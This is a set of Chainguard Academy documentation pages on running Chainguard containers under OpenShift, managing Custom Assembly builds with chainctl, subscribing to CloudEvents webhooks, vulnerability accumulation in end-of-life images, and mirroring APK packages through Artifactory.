By default, OpenShift Container Platform runs containers using an arbitrarily assigned User ID (UID), as described in the Red Hat documentation. There are required access settings for an image to support running as an arbitrary user:

- Directories and files that are written to by processes in the image must be owned by the root group, and that group must have both read and write permissions
- Files that will be executed must also have group execute permissions

Following the Red Hat requirements, to use Chainguard Containers you must make a change in your Dockerfile to set the required ownership and permissions. For example, if you have one or more files that you need to execute stored in /some/directory, then you would do this:

```
RUN chgrp -R 0 /some/directory && \
    chmod -R g=u /some/directory
```

Create /app Directory and HOME

When running on OpenShift clusters, you will find that the OpenShift user cannot create config files inside their home directory. This is because OpenShift is designed to start container instances using a random User ID. To avoid this being an issue when using Chainguard Containers:

- Set a HOME variable for the user (it would otherwise be set as / for root)
- Create an /app directory in every Dockerfile
- Set /app directory permissions to 755 and ownership to 65532:0

This can help you avoid or limit switching to the root user during the build phase when no package installation is required. Here’s a sample Dockerfile covering this process.

```
# Change this to reference the image you want to pull and
# if needed, to use the location of your custom image repo
FROM cgr.dev/$ORGANIZATION/aspnet-runtime-db:9

USER 0
RUN mkdir -m 775 /app && chown -R 65532:0 /app
COPY --chown=65532:0 src/Sample.Service/bin/Release/net9.0/publish /app

USER 65532
WORKDIR /app
ENV HOME=/app

ENTRYPOINT ["dotnet", "Sample.Service.dll"]
```

Use Special Container Images for Hard-coded User IDs

There are cases where Red Hat hard codes UIDs for specific applications; for example, the user for Postgres is set to UID 26. See the Red Hat documentation for more details. In this instance, Chainguard has built a special image for Postgres on OpenShift with a different release tag.
Where the Postgres release version is 17.5 and the regular Chainguard Container would be released with the tag 17.5, there is another image released with the tag 17.5-openshift.

Understand Security Context Constraints (SCCs)

OpenShift Container Platform includes security context constraints (SCCs) that you can use to control permissions for the pods in your cluster. SCCs determine the actions that a pod can perform and what resources it can access. By default, SCCs in OpenShift will prevent the root user from being used with the -dev variants of Chainguard Containers.

---

### Using chainctl to Manage Custom Assembly Resources

URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly-chainctl/ Last Modified: May 1, 2025 Tags: Chainguard Containers, Product, Procedural

Chainguard’s Custom Assembly is a tool that allows customers to create customized containers with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs.

You can use chainctl, Chainguard’s command-line interface tool, to further customize your Custom Assembly builds and retrieve information about them. This guide provides an overview of the relevant chainctl commands and outlines how you can edit the configuration of Custom Assembly containers, as well as retrieve a list of a customized image’s builds and its build logs.

Editing a Customized Container Image

To edit one of your organization’s Custom Assembly container images, you can run the chainctl image repo build edit command:

chainctl image repo build edit --parent $ORGANIZATION --repo $CUSTOMIZED_CONTAINER

This example includes the --parent flag, which points to the name of your organization, and the --repo argument, which points to the name of your customized image. If you omit these arguments, chainctl will prompt you to select your organization and customized image interactively.

This command will open up a file with your machine’s default text editor. This file will contain a structure like the following:

```
contents:
  packages:
    - yarn
    - wget
```

Edit this file by adding or removing any packages you like. Then, save and close the file. Before applying the change, chainctl will outline the changes you made and prompt you to confirm that you want to move forward with the change:

```
/tmp/3352123767.yaml (-deletion / +addition):
  contents:
    packages:
      - yarn
-     - wget
+     - bash

Applying build config to custom-node
Are you sure? Do you want to continue? [y,N]:
```

Enter y to apply the changes. Following that, you’ll be able to see the updated builds in the Chainguard Console, though it may take a few minutes for these changes to populate.

To edit a customized container image without any interactivity, you can use the apply subcommand. This method requires you to have a YAML file listing the desired packages, like the example created with this command:

```
cat > build.yaml <<EOF
contents:
  packages:
    - bash
    - curl
    - mysql
EOF
```

Then include this file in the apply command by adding the -f argument:

chainctl image repo build apply -f build.yaml --parent chainguard.edu --repo custom-assembly --yes

This command will again ask you to confirm that you want to apply the new configuration.
To make this example completely declarative, this example includes --yes to automatically confirm the changes: Applying build config to custom-assembly (*v1.CustomOverlay)(Inverse(protocmp.Transform, protocmp.Message{ "@type": s"chainguard.platform.registry.CustomOverlay", "contents": protocmp.Message{ "@type": s"chainguard.platform.registry.ImageContents", "packages": []string{ - "wolfi-base", + "bash", - "go", + "curl", + "mysql", }, }, })) Are you sure? Do you want to continue? [y,N]: This approach is useful in cases where you would prefer to avoid any kind of interactivity, as in a CI/CD or other automation system. Retrieving Information about Custom Assembly Containers You can also use the list subcommand to retrieve every one of a customized image’s builds from the past 24 hours: chainctl image repo build list --parent $ORGANIZATION --repo $REPO This command is useful for quickly determining which builds were successful or failed: START TIME | COMPLETION TIME | RESULT | TAGS --------------------------------+-------------------------------+---------+--------------------------------------------- Thu, 01 May 2025 10:10:40 PDT | Thu, 01 May 2025 10:10:45 PDT | Success | 20, 20.19, 20.19.1 Thu, 01 May 2025 10:10:34 PDT | Thu, 01 May 2025 10:10:46 PDT | Success | 22-slim, 22.15-slim, 22.15.0-slim Thu, 01 May 2025 10:10:33 PDT | Thu, 01 May 2025 10:10:41 PDT | Success | 23, 23.11, 23.11.0, latest . . . Lastly, you can also retrieve the logs for a given build with the logs subcommand: chainctl image repo build logs --parent $ORGANIZATION --repo $REPO This command will prompt you to select the build report you want to view. These are organized in reverse chronological order by the time of each build: Select a build report to view logs: Wed, 16 Apr 2025 16:36:52 PDT - Wed, 16 Apr 2025 16:37:08 PDT Success (18-dev, 18.20-dev, 18.20.8-dev) > Wed, 16 Apr 2025 16:36:45 PDT - Wed, 16 Apr 2025 16:37:00 PDT Success (20-dev, 20.19-dev, 20.19.0-dev) Wed, 16 Apr 2025 16:36:42 PDT - Wed, 16 Apr 2025 16:36:52 PDT Success (18, 18.20, 18.20.8) Wed, 16 Apr 2025 16:36:41 PDT - Wed, 16 Apr 2025 16:36:51 PDT Success (22-slim, 22.14-slim, 22.14.0-slim) Wed, 16 Apr 2025 16:36:32 PDT - Wed, 16 Apr 2025 16:36:57 PDT Success (22-dev, 22.14-dev, 22.14.0-dev) Wed, 16 Apr 2025 16:36:32 PDT - Wed, 16 Apr 2025 16:36:44 PDT Success (20-slim, 20.19-slim, 20.19.0-slim) Wed, 16 Apr 2025 16:36:29 PDT - Wed, 16 Apr 2025 16:36:41 PDT Success (23-slim, 23.11-slim, 23.11.0-slim) Wed, 16 Apr 2025 16:36:19 PDT - Wed, 16 Apr 2025 16:36:29 PDT Success (23, 23.11, 23.11.0, latest) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:42 PDT Success (23-dev, 23.11-dev, 23.11.0-dev, latest-dev) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:31 PDT Success (20, 20.19, 20.19.0) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:31 PDT Success (22, 22.14, 22.14.0) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:18 PDT Success (18-slim, 18.20-slim, 18.20.8-slim) Wed, 16 Apr 2025 16:35:35 PDT - Wed, 16 Apr 2025 16:35:47 PDT Success •••••••••••••• ↑/k up • ↓/j down • / filter • q quit • ? more Highlight your chosen build report and select it by pressing ENTER. This will open up the build’s logs: 2025-04-17T16:00:08-07:00[INFO]Building image with locked configuration: {Contents:{BuildRepositories:[] RuntimeRepositories:[https://apk.cgr.dev/45a0c61eEXAMPLEf050c5fb9ac06a69eed764595] Learn More The chainctl commands outlined in this guide show how you can interact with Chainguard’s Custom Assembly tool from the command line. 
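Because these subcommands accept explicit flags and support non-interactive confirmation, they are straightforward to script. The following is a minimal sketch (not an official workflow) of how you might apply a configuration and then check the resulting builds from a CI job, assuming the build.yaml file and the $ORGANIZATION and $REPO variables used earlier in this guide.

```sh
#!/bin/sh
# Minimal sketch of automating Custom Assembly updates with chainctl.
# ORGANIZATION and REPO are assumed to be set in the environment, and
# build.yaml is the package list file created earlier in this guide.
set -e

# Apply the desired package configuration without prompting.
chainctl image repo build apply -f build.yaml \
  --parent "$ORGANIZATION" --repo "$REPO" --yes

# List the builds from the last 24 hours to confirm the rebuild succeeded.
chainctl image repo build list --parent "$ORGANIZATION" --repo "$REPO"
```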
You can also interact with Custom Assembly with the Chainguard API. Our tutorial on Using the Chainguard API to Manage Custom Assembly Resources outlines how to run a demo application that updates the configuration of a Custom Assembly container through the Chainguard API. --- ### Subscribing to Chainguard CloudEvents URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/events-example/ Last Modified: April 25, 2025 Tags: Product, CloudEvents, Procedural Chainguard implements CloudEvents, a specification for a standard format for events data. This means developers can use events (generated based on interactions with Chainguard resources) to initiate processes and thus automate certain actions. For example, you could set up infrastructure to listen for push events to an organization’s private registry and mirror any new Chainguard Containers in the registry to a third-party repository. This article includes an example of how to use chainctl to create an event subscription. It also includes details on how to validate events from Chainguard and highlights some potential use cases for them. This article is primarily focused on Registry push and pull events. Push events occur when an image in your entitlement is added or updated. Pull events occur when an image is pulled from your Chainguard repository. Be aware, though, that there are also events related to IAM, such as user creation and adding identity providers. Subscribing to Events To subscribe to Chainguard events for your account, use the following chainctl command: chainctl events subscriptions create https://<Your webhook URL> The webhook URL should connect to a service that you use to process the requests. This can use whatever infrastructure works for your team, but a common choice is to use a serverless service such as AWS Lambda or Google Cloud Run. As an example, this guide uses Webhook.site. This is an open-source application that will generate a URL you can use to receive, send, and transform webhooks, among other actions. Webhook.site can be self-hosted, but for the purposes of this guide you can just use the cloud version of the application. Note: You can also try this out with alternative webhook testing sites, like smee.io. Once you have the webhook URL, use a chainctl command similar to the following to set up a subscription to events for your account: chainctl events subscriptions create https://webhook.site/aEXAMPLE-b689-49a5-94df-f1dEXAMPLE29 Select the organization whose events you want to subscribe to when prompted. If successful, this returns an ID for the subscription: ✔ Selected folder chainguard.edu. ID | SINK ------------------------------------------------------------+------------------------------------------------------------ 45a0cEXAMPLE977f050c5fb9EXAMPLEeed764595/91b3cdEXAMPLE7a6 | https://webhook.site/aEXAMPLE-b689-49a5-94df-f1dEXAMPLE29 In order to generate an event, try pulling an image from your organization’s repository within the Chainguard registry: docker pull cgr.dev/chainguard.edu/istio-pilot:1-dev Be sure to change this command to use your own organization’s repository and an image you have access to. 7.0.10: Pulling from chainguard.edu/istio-pilot Digest: sha256:5a4583fb12ee4b33306a2c23ff33c9f2d04e6d1c7580703850928abf50de5dcf Status: Image is up to date for cgr.dev/chainguard.edu/istio-pilot:1-dev cgr.dev/chainguard.edu/istio-pilot:1-dev Then, navigate back to Webhook.site. 
It may take a few moments, but in time an event will appear with request content like the following:

```
{
  "actor": {
    "subject": "261ea43771f4d962f17c1d206155a38b9b17ff18",
    "act": {
      "aud": "Hvqy7yoEhI8TY1zX9rPrsdcIntDz9yh2",
      "aws-acct": "",
      "aws-arn": "",
      "email": "",
      "iss": "https://auth.chainguard.dev/",
      "sub": "google-oauth2|117799788801679028930"
    }
  },
  "body": {
    "repository": "chainguard.edu/istio-pilot",
    "repo_id": "45a0cEXAMPLE977f050c5fb9EXAMPLEeed764595/e2fca7026fbaa243",
    "tag": "1-dev",
    "digest": "sha256:043446cbda630e5071e4f72736b38b5249c859d07bb14886cd93b4e36fc3402c",
    "method": "HEAD",
    "type": "manifest",
    "when": "2025-04-23T00:37:47.810899",
    "location": "",
    "remote_address": "76.169.101.202",
    "user_agent": "docker/27.3.1 go/go1.22.7 git-commit/41ca978 kernel/6.8.0-57-generic os/linux arch/amd64 UpstreamClient(Docker-Client/27.3.1 \\(linux\\))"
  }
}
```

This sample request has the following headers:

| Header | Value |
| --- | --- |
| accept-encoding | gzip |
| traceparent | 00-6f9aceb3276e8c60676cf04099d8818d-dd75e26d099ef057-00 |
| original-traceparent | 00-6f9aceb3276e8c60676cf04099d8818d-dd75e26d099ef057-00 |
| content-type | application/json |
| ce-type | dev.chainguard.registry.pull.v1 |
| ce-time | 2025-04-23T00:37:47Z |
| ce-subject | 45a0c61ea6fd977f050c5fb9ac06a69eed764595/7214b8ddd5ce879d |
| ce-specversion | 1.0 |
| ce-source | cgr.dev |
| ce-id | 188888b6-27d2-4a80-8ad5-c7450ab89c0c |
| ce-group | 45a0c61ea6fd977f050c5fb9ac06a69eed764595 |
| ce-audience | customer |
| ce-actor | enforce-prod-registry-jzjewxe4@prod-enforce-fabc.iam.gserviceaccount.com |
| authorization | Bearer … |
| content-length | 721 |
| user-agent | Chainguard Enforce bd6a3e9-dirty |
| host | webhook.site |

This shows that you have successfully subscribed the test service to Chainguard Events.

Filtering Events

The webhook will get all events for your organization. You will need to filter them to only the events you are interested in, which can be done using the ce-type header. For pull events the type is dev.chainguard.registry.pull.v1 and push events are of type dev.chainguard.registry.push.v1. A full description of all events and their types is available on Chainguard Academy.

Validating Events

Before processing an event from Chainguard, you should ensure that it is valid. Every Chainguard event has a JSON Web Token (JWT) formatted OIDC ID token in its Authorization header. For authorization purposes, there are two important fields to validate:

- Use the iss field to ensure that the issuer is Chainguard, specifically https://issuer.enforce.dev.
- Use the sub field to check that the event matches your configured Chainguard identity. For example, assuming a UIDP ID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6, the sub field’s value will resemble the following: webhook:0475f6baca584a8964a6bce6b74dbe78dd8805b6. If the subscription is in a sub-group, then the value will have the corresponding group SUID appended to the path.

Validating these fields before processing the JWT token using a verification library can save resources, as well as alert you about suspicious traffic or misconfigured Chainguard organization settings.

Use Cases

Events can be used to drive a wide range of processing scenarios, including the following:

- Copying images to another registry when an image is updated
- Kicking off an image rebuild process when a base image is updated
- Logging new image availability to a Slack channel
- Logging pulls and user creation to check for unexpected or unauthorized usage

Chainguard’s platform-examples repository contains example code for implementing workflows based on events.
Most examples are based on Terraform and work with the Google Cloud Platform, but should be portable to other environments. Learn More This article outlined details on what Chainguard Events are, how to use them, and some common use cases. For more information on CloudEvents, you can refer to cloudevents.io. You can also find more details in Chainguard’s CloudEvents reference documentation. --- ### How End-of-Life Software Accumulates Vulnerabilities URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/how-eol-software-accumulates-cves/ Last Modified: December 4, 2024 Tags: Chainguard Containers, CVE Typically, specific versions of software receive updates on a schedule for a set amount of time. Eventually, though, every version of software will stop receiving support. When project maintainers stop providing updates, it’s known as the End-of-Life (EOL) stage. Because it’s no longer being actively maintained, software begins to collect vulnerabilities when it reaches EOL. This problem can become compounded when using container images, as they often come with extra components from underlying base images which are all prone to accruing vulnerabilities. This can lead to images with hundreds of components, each collecting vulnerabilities and forming part of the attack surface. This conceptual article highlights the risk involved with using end-of-life software by outlining how EOL images accrue vulnerabilities and where they accumulate. Findings Chainguard’s internal research team came to the following conclusions after scanning a set of official Docker images that had reached EOL: Takeaway 1: The longer a project has been EOL, the more vulnerabilities that image will have. On average, an EOL image will accumulate 218 vulnerabilities every six months. Takeaway 2: 98.4% of these vulnerabilities accumulate within a given image’s components, 1.4% in the application dependencies, and only 0.2% of vulnerability accumulation every six months are directly within the application. With these takeaways in mind, it’s clear that images with EOL software can quickly develop serious security risks. Not only does the target application accumulate vulnerabilities, but so do the dependencies and additional image components, and at a much faster pace. When a vulnerability appears directly in the source code of the application, that application isn’t going to receive a patch from upstream. This means you’ll be forced to update the software or even move on from EOL projects or risk compromising your application’s security. Vulnerability accumulation in EOL images To perform this analysis, Chainguard’s researchers reviewed a set of software projects listed on endoflife.date, a website that keeps track of when products are no longer supported. We matched these projects directly with their official Docker Hub images, finding 38 projects across 237 EOL version releases from 2020–2024. This included popular images such as Traefik, nginx, Rust, and Python. Each version is the last within the project lifecycle right before the EOL date, representing the final updates to the project before it goes EOL. We then used Grype to scan each release to determine where vulnerabilities are appearing in the projects. When scanning an image for vulnerabilities, our researchers would classify a vulnerability as being in one of three locations: Application: The core software intended for execution, fulfilling the container’s primary purpose. Think of images such as Traefik, Consul, or nginx. 
Application dependencies: Software or libraries the application requires to function and are dependent on the core application source code. For example, Traefik depends on a TOML parser for Golang.

Image components: Additional packages or libraries included within the image, often influenced by the base image. For example, Traefik uses the base Alpine image and thus includes many of its packages.

Within this dataset, the support lifespan for these projects was almost two years, with the median support duration being one year. By aggregating vulnerability counts in six-month intervals based on the EOL date, we calculated the average number of vulnerabilities per project. We noted these versions as the last version prior to the EOL date, representing the final updates for that project lifecycle.

The number of vulnerabilities differs drastically between older EOL versions and recent EOL versions, as shown in the following diagram. For example, images that went EOL in early 2020 contained an average of 2,065 vulnerabilities by 2024, compared to 323 vulnerabilities for images that reached EOL in 2024. On average, this equates to an accumulation rate of 218 vulnerabilities every six months in EOL images.

Where are the vulnerabilities?

| Time since EOL | Application Vulns | Application Dependency Vulns | Image Component Vulns |
| --- | --- | --- | --- |
| 0-6 months | <1 CVE | 3 CVEs | 351 CVEs |
| 6-12 months | 1 CVE | 11 CVEs | 542 CVEs |
| 12+ months | 3 CVEs | 33 CVEs | 1,601 CVEs |

Application vulnerabilities

Less than 1% of vulnerability accumulation occurs directly in an image’s application, and we found that only 14% of versions that contained a vulnerability included a vulnerability directly within the application in the first six months post-EOL. Project maintainers won’t patch these CVEs, and updating to a newer version or patching it yourself in the source code are the only options for addressing these vulnerabilities.

Dependency vulnerabilities

In the first six months after an image reaches the EOL stage, 40% of versions contain a vulnerability in the application dependencies. The following table outlines how many vulnerabilities, on average, a dependency will accumulate over time:

| Time span | Number of CVEs |
| --- | --- |
| 0-6 months | 3 |
| 6-12 months | 11 |
| 12+ months | 32 |

Fixing these would involve upgrading dependencies and rebuilding the target application, a difficult and labor-intensive task.

Image component vulnerabilities

As mentioned previously, more than 98% of vulnerability accumulation occurs within the components of the image:

| Time span | Number of CVEs |
| --- | --- |
| 0-6 months | 340 |
| 6-12 months | 501 |
| 12+ months | 1,552 |

Ninety-seven percent of these vulnerabilities are within Debian packages. Per this blog post, many of these vulnerabilities are found in the latest stable versions of these Debian packages, meaning that you can’t make them go away with just an apt upgrade.

A deeper look at Traefik

When scanning the official Alpine-based image for Traefik with Grype, Chainguard’s researchers found that the image versions generally accumulated fewer vulnerabilities than typical, with an average of 25 vulnerabilities identified every six months, as shown in the previous table. Take version 2.9 of Traefik as an example. It was released on October 3, 2022, with security support provided until April 24, 2023, which is roughly six months. The final update for this version, 2.9.10, was made available on April 6, 2023, just three weeks before the end of its support lifecycle.
Following the release of version 2.9.10, 55 vulnerabilities were reported: four within Traefik itself, 31 associated with its application dependencies, and 20 related to the Docker image components. Below are example CVEs within the various locations of version 2.9.10 of the official Traefik Docker image. Example CVE within Traefik CVE-2023-47633: Traefik docker container using 100% CPU. This issue was addressed in versions 2.10.6 and 3.0.0-beta5. There are no known workarounds for this vulnerability; your only option is to upgrade. Example CVE within a dependency (Docker) of Traefik CVE-2023-28840: Docker Swarm encrypted overlay network may be unauthenticated. The affected project is github.com/docker/docker, a dependency of Traefik. We fixed this vulnerability in the Chainguard Container of the Traefik 2.10 cycle. Example CVE within an image component of Traefik CVE-2023-5363: An out-of-bounds write within OpenSSL, a dependency of the base image Alpine 3.17 used by Traefik (impacts libcrypto3 and libssl3). The Chainguard Container of Traefik uses the wolfi-base image, which runs the updated versions of libcrypto3 and libssl3. Learn More End-of-life software represents a significant security risk. This issue becomes particularly critical when vulnerabilities are found directly in the target application of the image. The only option when that occurs is to update. However, the vast majority of vulnerabilities that appear in an EOL image will come from its additional components, meaning that updating just the application software may not significantly reduce the overall number of vulnerabilities. Thus, the best option is to have a plan to keep your software updated to the latest versions promptly. To learn more about keeping container images up to date, we encourage you to check out our article on Considerations for Keeping Containers Up to Date as well as our overview of Strategies and Tooling for Updating Containers. --- ### How to Mirror Packages from Chainguard Package Repositories to Artifactory URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifactory/artifactory-packages-pull-through/ Last Modified: November 14, 2024 Tags: Chainguard Containers, Product This tutorial outlines how to set up remote Alpine package repositories with JFrog Artifactory. Specifically, it will walk you through how to set up two repositories you can use as a pull through cache for Chainguard’s public package repositories. This guide will then outline how you can configure an image to pull APK packages from these repositories. It will also go over how you can use one of Artifactory’s virtual repositories as a pull through cache. Prerequisites In order to complete this tutorial, you will need administrative privileges over an Artifactory instance. If you’re interested in testing out this configuration, you can set up a trial instance on the JFrog Artifactory landing page. Note: As you follow this guide, you may run into issues if your Artifactory username is an email address; specifically, the @ sign can lead to errors. For simplicity’s sake, we recommend that you use a user profile with a name that only contains letters and numbers. If you must use an email address as your Artifactory username, though, this guide will include instructions for working around the issue.
Setting Up Remote Artifactory Repositories to Mirror Public Chainguard Package Repositories To set up a remote repository in Artifactory from which you can pull public Chainguard packages, log in to the JFrog platform. Once there, select the Administration tab near the top of the screen and select Repositories from the left-hand navigation menu. On the Repositories page, click the Create a Repository button and select the Remote option. Next, you’ll need to select the type of repository to set up. Because all packages offered by Chainguard are APKs, select Alpine. First, we’ll set up a remote repository to mirror the Wolfi APK packages repository. On the new page, you can enter the following details in the Basic configuration tab:
- Repository Key — This is used to refer to your remote repository. You can choose whatever name you like here, but this guide’s examples will use the name cg-wolfi.
- URL — This must be set to https://packages.wolfi.dev/os.

Keep all the remaining fields set to their default values and click the Create Remote Repository button. A modal window will appear letting you know that the repository was created successfully. For now, hold off on clicking the Set Up Alpine Client button, as you will take care of configuring this repository shortly. Before getting to that, repeat the process to create another remote repository. This one will serve as a pull through for Chainguard’s Extra Packages repository. This repository provides the latest packages for software products with non-open-source licenses. Once again, from the Repositories page, click the Create a Repository button, select the Remote option, and then select Alpine to create an Alpine repository. Enter the following details for your new remote repository in the Basic configuration tab:
- Repository Key — Again, you can choose whatever name you like here, but this guide’s examples will use the name cg-extras.
- URL — This must be set to https://packages.cgr.dev/extras.

Following that, click the Create Remote Repository button to create the new remote repository. Generate tokens for remote repositories Before testing whether you’re able to pull packages through the remote repositories, you will need to retrieve a token generated by Artifactory for both of them. To generate these tokens, you can either click the Set Up Alpine Client button after creating the remote repository or you can retrieve them from the Repositories page. On the Repositories page, find the ellipsis (⋯) all the way to the right of the repository’s row. Click on it, and then select Set me up. This will open a modal window from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks whose contents you can copy. The first code block will contain a token you can use to access the remote Artifactory repository. The second block will contain an echo command you can use to add a URL to an /etc/apk/repositories file. Take note of the token generated for each repository. Then, run the following export commands to create a few environment variables, replacing my-wolfi-token and my-extras-token with the respective token you noted down.
You will use these environment variables in the next sections as you test out these remote repositories: export WOLFI_TOKEN=my-wolfi-token export EXTRAS_TOKEN=my-extras-token Additionally, create two more environment variables to hold your Artifactory user profile and hostname: export ARTIFACTORY_USER_PROFILE=my-user-profile export ARTIFACTORY_HOSTNAME=my-artifactory-hostname If you aren’t sure of these values, you can find them in the command from the Set Up An Alpine Client window where you found the token: sudo sh -c "echo 'https://linky:<TOKEN>@example-hostname.jfrog.io/artifactory/cg-wolfi/<BRANCH>/<REPOSITORY>' >> /etc/apk/repositories" In this example, the Artifactory user profile is linky and the hostname is example-hostname. If your Artifactory user profile is an email address, you will encounter an error unless you percent-encode the @ sign, like this: export ARTIFACTORY_USER_PROFILE=linky%40example.com Here, the Artifactory user profile is linky@example.com. Testing pull through from remote package repositories interactively In order to test that you’re able to pull packages from the remote Artifactory repositories you just created, this section outlines how to build a container image (using a Chainguard image as a base) and configure it to pull packages from these repositories. Open a terminal and create a Dockerfile: cat > Dockerfile <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$WOLFI_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-wolfi/' >> /etc/apk/repositories RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$EXTRAS_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-extras/' >> /etc/apk/repositories EOF This Dockerfile uses the python:latest-dev image, but you can use any image that you have access to. However, after the image is built we will open up an interactive shell to test whether we can actually install packages from these repos with apk, so whatever image you use should be one that has a shell available. Note that this Dockerfile renames the default /etc/apk/repositories file. This isn’t necessary, but doing so will allow you to ensure that you’re actually downloading packages from the remote Artifactory repositories instead of the default ones. After creating the Dockerfile, use it to build a new image. Here, we tag the image ar-interactive: docker build -t ar-interactive . Once the image is built, run it. Be sure to include the -it and --entrypoint options to run it with an interactive shell: docker run -it --entrypoint /bin/sh ar-interactive Now that the container is running, you can check whether it was configured correctly and that you can pull packages from the remote Artifactory repositories. First check that the /etc/apk/repositories file contains the correct lines: cat /etc/apk/repositories https://<ARTIFACTORY-USER-PROFILE>:<WOLFI-TOKEN>@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-wolfi/ https://<ARTIFACTORY-USER-PROFILE>:<EXTRAS-TOKEN>@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-extras/ Then test that you can install a package from these repositories with apk.
This example installs the curl package: apk add curl fetch https://<ARTIFACTORY-USER-PROFILE>:*@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-wolfi/ fetch https://<ARTIFACTORY-USER-PROFILE>:*@<ARTIFACTORY-HOSTNAME>.jfrog.io/artifactory/cg-extras/ (1/1) Installing curl (8.11.0-r0) Executing glibc-2.40-r3.trigger Executing busybox-1.37.0-r0.trigger OK: 576 MiB in 77 packages This output shows that curl was indeed correctly installed from the remote Artifactory repository. You can confirm this from the Artifactory dashboard. Navigate to the Application tab, then select Artifactory in the left-hand navigation menu and select Artifacts. From there, expand the menu option for the cg-wolfi Artifactory repository. There, you will find the curl package listed. This shows that the pull through and caching occurred as expected. Testing pull through within a build You can also use the remote Artifactory repositories to install packages directly within a Dockerfile. To try this out, create another Dockerfile: cat > Dockerfile.build <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$WOLFI_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-wolfi/' >> /etc/apk/repositories RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$EXTRAS_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-extras/' >> /etc/apk/repositories RUN apk add nodejs-22 USER nonroot EOF This example will install the nodejs-22 package into the built image. After creating the Dockerfile, build the image. Note that this command includes the -f option to specify that it should build the image with the Dockerfile you just created: docker build -t ar-build -f Dockerfile.build . Once again, you can confirm that the pull through and caching worked as expected by checking the Artifacts page in the Artifactory dashboard. Setting Up a Virtual Repository to Mirror Packages Artifactory allows you to create what it refers to as virtual repositories. A virtual repository is a collection of one or more repositories (such as local, remote, or other virtual repositories) that have the same package type. The benefit of this is that you can access resources from multiple locations using a single logical URL. You can also use a virtual repository as a pull through cache. To illustrate, create a new virtual repository. From the Repositories tab, click the Create a Repository button. This time, select the Virtual option, but instead of selecting the Alpine package type, select Generic. You can use the Alpine package type, but virtual Alpine repositories will only allow you to pull packages that have already been cached by an associated remote repository. A Generic artifact repository will provide more flexibility. On the New Virtual Repository page, enter a key of your choosing into the Repository Key field. You can enter whatever you’d like here, but for this guide we will refer to this repository as cg-apk-virt. Next, you must select existing repositories to include within this virtual repository. To keep things simple, we will use the cg-wolfi and cg-extras repositories created previously. Select your repositories by clicking their respective checkboxes. Then be sure to click the right-pointing chevron to move them to the Selected Repositories column. Finally, click the Create Virtual Repository button. As before, a modal window will appear letting you know that the repository was created successfully. 
Click the Set Up Generic Client button at the bottom of this window to retrieve the token you’ll need to test whether you can pull packages through this repository. With this token in hand, create another environment variable: export VIRTUAL_TOKEN=my-virtual-repo-token You’ll use this token to create one more Dockerfile in the next section. Testing pull through with a virtual package repository As outlined previously, create a Dockerfile that configures an image to use the virtual repository you just created. You can test this out however you like, but we will stick to one example here showing how to install a package into the built image: cat > Dockerfile.virtual <<EOF FROM cgr.dev/chainguard/python:latest-dev USER root RUN mv /etc/apk/repositories /etc/apk/repositories.disabled RUN echo 'https://$ARTIFACTORY_USER_PROFILE:$VIRTUAL_TOKEN@$ARTIFACTORY_HOSTNAME.jfrog.io/artifactory/cg-apk-virt/' >> /etc/apk/repositories RUN apk add nodejs-18 USER nonroot EOF This example will install the nodejs-18 package. After creating the Dockerfile, build the image with the Dockerfile you just created: docker build -t ar-virtual -f Dockerfile.virtual . This command will install the nodejs-18 package from the virtual repository as it builds the image. Debugging pull through from Chainguard’s registry to Artifactory If you run into issues when trying to pull from Chainguard’s package repositories through Artifactory, you can try checking for these common pitfalls:
- You may run into issues if your Artifactory username is an email address; specifically, the @ sign can lead to errors. Be sure that you’re using a user profile with a name that only contains letters and numbers.
- Ensure that all network requirements are met.
- When configuring a remote Artifactory repository, ensure that the URL field is set correctly.
- It may help to clear the Artifactory cache.
- It could be that your Artifactory repository was misconfigured. In this case, create and configure a new Remote Artifactory repository to test with.

Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by referring to our documentation, and learn more about working with the Chainguard platform by reviewing our Administration documentation. If you’d like to learn more about JFrog Artifactory, we encourage you to refer to the official Artifactory documentation. --- ### STIGs for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/image-stigs/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product The practice of using Security Technical Implementation Guides, or “STIGs,” to secure various technologies originated with the United States Department of Defense (DoD). If an organization uses a certain kind of software, say MySQL 8.0, they must ensure that their implementation of it meets the requirements of the associated Security Requirements Guides (SRG) in order to qualify as a vendor for the DoD. More recently, other compliance frameworks have begun acknowledging the value of STIGs, with some going so far as to require the use of STIGs in their guidelines. Chainguard announced the release of a STIG for the General Purpose Operating System (GPOS) SRG — an SRG that specifies security requirements for general purpose operating systems running in a network.
